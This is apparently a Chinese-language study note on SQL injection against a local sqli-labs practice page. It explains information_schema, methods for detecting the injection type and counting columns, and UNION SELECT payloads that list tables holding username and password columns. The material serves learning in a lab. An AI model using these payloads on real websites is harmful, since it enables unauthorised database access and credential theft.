网络安全(sql注入)

这里写目录标题

[一. information_schema.tables 和 information_schema.schemata是information_schema数据库中的两张表](#一. information_schema.tables 和 information_schema.schemata是information_schema数据库中的两张表)
- [1. information_schema.schemata](#1. information_schema.schemata)
- [2. information_schema.tables](#2. information_schema.tables)
[二. 判断注入类型](#二. 判断注入类型)
- [1. 判断数字型还是字符型注入](#1. 判断数字型还是字符型注入)
- [2. 判断注入闭合是""还是''](#2. 判断注入闭合是""还是'')
[三. 判断表的列数](#三. 判断表的列数)
[五. 注入变量的类型](#五. 注入变量的类型)
[六. SQL注入步骤](#六. SQL注入步骤)
- 快速判断是数字还是字符型输入方法为：

什么是sql注入，按理来说我们的查询语句应该在后台构建，不应该把查询语句放到url中，但是sql注入就是通过语法漏洞将查询语句放到url中，从而进行入侵

一. information_schema.tables 和 information_schema.schemata是information_schema数据库中的两张表

1. information_schema.schemata

功能：information_schema.schemata 表提供关于当前数据库实例中所有数据库（或称为"模式"，schema）的信息。

常用列：

schema_name：数据库或模式的名称。

catalog_name：数据库目录的名称（通常是数据库实例的名称）。

default_character_set_name：数据库的默认字符集。

default_collation_name：数据库的默认排序规则。

用途：用于列出数据库实例中所有的数据库。可以帮助管理员了解在数据库服务器上有哪些数据库或模式。

2. information_schema.tables

功能：information_schema.tables 表提供当前数据库实例中所有表（包括视图）的信息。

常用列：

table_catalog：表的目录名称（通常是数据库实例的名称）。

table_schema：表所属的数据库或模式的名称。

table_name：表的名称。

table_type：表的类型（BASE TABLE表示物理表，VIEW表示视图等）。

engine（MySQL特有）：表使用的存储引擎（例如，InnoDB、MyISAM 等）。

用途：用于列出所有表以及它们所属的数据库。可以帮助管理员或开发人员了解每个数据库中存在的表和视图。

区别总结

信息内容：schemata 提供的是数据库级别的信息（列出所有数据库），而 tables 提供的是表级别的信息（列出所有表及其所属的数据库）。

用途：schemata 用于查看数据库实例中有哪些数据库；tables 用于查看具体的数据库中有哪些表或视图。

sql 复制代码

如果你想查看当前实例中有哪些数据库，可以使用：
表示从information_schema.schemata这张表中查询信息

SELECT schema_name FROM information_schema.schemata;


如果你想查看某个特定数据库中的所有表，可以使用：

SELECT table_name FROM information_schema.tables WHERE table_schema = 
'your_database_name';

sql 复制代码

查看当前数据库中的所有表名和表中对应列名
SELECT * FROM `users` WHERE id=-1 UNION SELECT 1, table_name, column_name FROM 
information_schema.columns where table_schema=database();

使用group by就必须使用聚合函数如MIN(),SUM(),GROUP_CONCAT()，count()。

同时having尽量和group by连用，因为having后要使用聚合函数如：HAVING SUM(salary) > 5000。这种功能在 WHERE 中是无法实现的，因为 WHERE 无法作用于聚合结果。

sql 复制代码

SELECT GROUP_CONCAT(id) AS ids, department, COUNT(*) AS 
employee_count, 
SUM(salary) AS total_salary
FROM employees
GROUP BY department;

ids	department	employee_count	total_salary
1,4	HR	2	9800
2,3	IT	2	11500

查询当前数据库中只包含username和password列的表，这里使用了group by因为只有使用了group by

分组后，使用having进行聚合会更加精细。

sql 复制代码

http://localhost/sql/Less-2/
?id=-2 union select 1,group_concat(distinct table_name),3 from
information_schema.columns where table_schema=database() and column_name in 
('username','password') group by table_name having count(distinct column_name)=2

二. 判断注入类型

1. 判断数字型还是字符型注入

字符型注入需要构造闭合，数字型不需要。

2. 判断注入闭合是""还是''

如果是字符型注入且闭合类型为""，输入http://localhost/sql/Less-2/?id=1则会默认给1加上闭合为：

sql 复制代码

SELECT * FROM table_name WHERE id = "1";
或
SELECT * FROM table_name WHERE id = '1';
具体取决于闭合形式是''还是""

视频链接13：21
文档

如果是字符型注入且闭合类型为""，输入http://localhost/sql/Less-2/?id=1"则为

sql 复制代码

SELECT * FROM table_name WHERE id = "1"";
因为不闭合所有肯定会报错

此时我们在语句后加注释

http://localhost/sql/Less-2/?id=1" -- （注意末尾有一个空格），则可以注释掉"

sql 复制代码

SELECT * FROM table_name WHERE id = "1";
正确

三. 判断表的列数

如果有表有三列则会正常返回结果

http://localhost/sql/Less-2/?id="1" group by 3

sql 复制代码

SELECT * FROM table_name WHERE id = "1" GROUP BY 3;

或者使用

http://localhost/sql/Less-2/?id="1" order by 3

sql 复制代码

SELECT * FROM table_name WHERE id = "1" ORDER BY 3;

五. 注入变量的类型

比如对一个数字型注入输入，http://localhost/sql/Less-2/?id=0 OR username=Dumb，错误

输入http://localhost/sql/Less-2/?id=0 OR username="Dumb"正确，因为username是char型的，查找类型不匹配也不行

六. SQL注入步骤

快速判断是数字还是字符型输入方法为：

输入http://localhost/sql/Less-2/?id=0 and 1=1，如果报错则是字符型输入。因为当前查询会被转换为
sql 复制代码
```
SELECT * FROM users WHERE id = '1 and 1=1';
id是整形，在去掉闭合后id=1 and 1=1，肯定不匹配报错.
```
如果要注入则需要变为

http://localhost/sql/Less-2/?id=0' and 1=1 -- （注意--后保留一个空格）
sql 复制代码
```
SELECT * FROM users WHERE id = '1' and 1=1;
去掉闭合后id=1，满足整形
```
1. 输入http://localhost/sql/Less-2/?id=2-1，如果是数字型则会返回id=1的列
  使用select 1，2，database()等来查询数据库的库名